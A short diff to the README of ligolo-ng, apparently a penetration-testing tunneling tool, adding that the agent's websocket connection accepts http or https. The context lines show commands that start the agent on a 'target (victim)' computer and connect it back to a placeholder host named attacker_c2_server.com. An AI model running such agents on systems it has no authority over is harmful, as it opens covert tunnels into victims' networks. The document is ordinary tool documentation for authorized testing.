virusvfv/ligolo-ng/README.md

 $ ./agent -connect attacker_c2_server.com:11601
 ```

-Or you can start the *agent* on your target (victim) computer and connect via websocket:
+Or you can start the *agent* on your target (victim) computer and connect via websocket (http or https):

 ```shell
 $ ./agent -connect https://attacker_c2_server.com:8443